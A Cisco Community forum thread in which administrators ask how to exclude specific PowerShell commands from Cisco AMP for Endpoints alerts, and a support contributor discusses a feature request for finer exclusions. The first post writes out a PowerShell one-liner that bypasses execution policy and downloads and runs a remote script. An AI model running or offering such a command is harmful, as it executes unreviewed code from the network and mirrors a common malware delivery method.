Solved: Re: exclude/whiteliste certain powershell commands

thomas.methlie · ‎10-11-2019

Admins being admins like to use powershell to solve certain task. To do this they will often run a powershell file downloaded from a server, i.e:

C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('https://example.com/script.ps1'))

This being an obvious red flag triggers AMP, but gives a lot of false positives in this case.

Is there any way to exclude/whitelist something like this? Like the full command with arguments, the server from which it downloads??

Regards,

Thomas

Troja007 · ‎10-16-2019

Opened a Feature Request for you.

Greetings,

Thorsten

View solution in original post

balaji.bandi · ‎10-11-2019

Are you looking to exclude this AMP for end point, here is the exclustiondocument to exclude certain extension as per the requirement,ent.

https://www.cisco.com/c/en/us/support/docs/security/amp-endpoints/213681-best-practices-for-amp-for-endpoint-excl.html

BB

***** Rate All Helpful Responses *****

How to Ask The Cisco Community for Help

thomas.methlie · ‎10-11-2019

thanks but that guide doesn´t provide any info on my problem. To be more precise, I don´t want to exclude powershell process or ps script files on a general basis

Troja007 · ‎10-16-2019

Hello Thomas,

sorry to say, but, as explained in the documentation this is the way we can handle exclusions today. The best way is to report this missing feature to your Cisco Representative to open a Feature Request for this.

Just to be sure: You are getting a lot of IOCs?

Greetings,

Thorsten

thomas.methlie · ‎10-16-2019

Hi,

yeah this is one of our largest sources of false positive alerts and spend quite some time cleaning up the dashboard. Could of course mute the events, but I don´t feel comfortable muting too much stuff.

Thanks for opening a Feature Request.

Regards,

Thomas

Troja007 · ‎10-17-2019

So,

what would help? Defining an exclusion with several parameters?

Including:

Path of the Process, Process name
Hash and Signer
Source where the file is downloaded from

Looks easy, but is much more development effort. The questions is, where to enforce.

Endpoint: We have to define how big the time window is the endpoint can monitor AND what the performance/resource impact on the endpoint is.
Backend: Changing the whole logic. This must be done for every customer, because exclusions will be different.
- We also need some kind of "plausibility check" to avoid impacts in the backend based on wrong defined exclusions.

But finally, something which should be included in the product.

Cheers,

Thorsten

thomas.methlie · ‎10-22-2019

Yes, the three parameters you mention is what I was initially thinking of.

If there is a need to assist in testing this, I would be happy to help.

Regards,

Thomas

Troja007 · ‎10-23-2019

Hello @thomas.methlie,

the only way today is, getting in contact with your Cisco Representative to open a Feature Request.

Greetings,

Thorsten

Troja007 · ‎10-16-2019

Opened a Feature Request for you.

Greetings,

Thorsten

POAL · ‎11-14-2019

We're waiting with bated breath for this feature to come out as we have the same problem. We use powershell to deploy all our stuff and it triggers Cisco AMP on a weekly basis with false positives. It's causing alert fatigue for our analysts but we don't want to exclude ALL powershell.exe as some of them might in fact be malicious. Please please please give us this new feature that allows exclusions on specific powershell scripts.

Thanks!

rolszowy · ‎11-14-2019

There is one option at the moment to exclude particular IOC by the TAC case.

Radek

Shinku · ‎12-15-2020

Can you elaborate? Where/how can we exclude by IOC?

gmcclintick1 · ‎04-05-2021

What is the feature request number? Roadmap timing for this?

Troja007 · ‎04-06-2021

Hello,

this Feature Request is an internal one, and not public viewable. You may get in touch with your Cisco representative to get more insights into upcoming features in the product.

As the roadmap can always get updated, we do not publish this information in the community.

Greetings,

Thorsten

Davedog · ‎10-18-2022

I saw the feature request was going in in 2019, any update on it?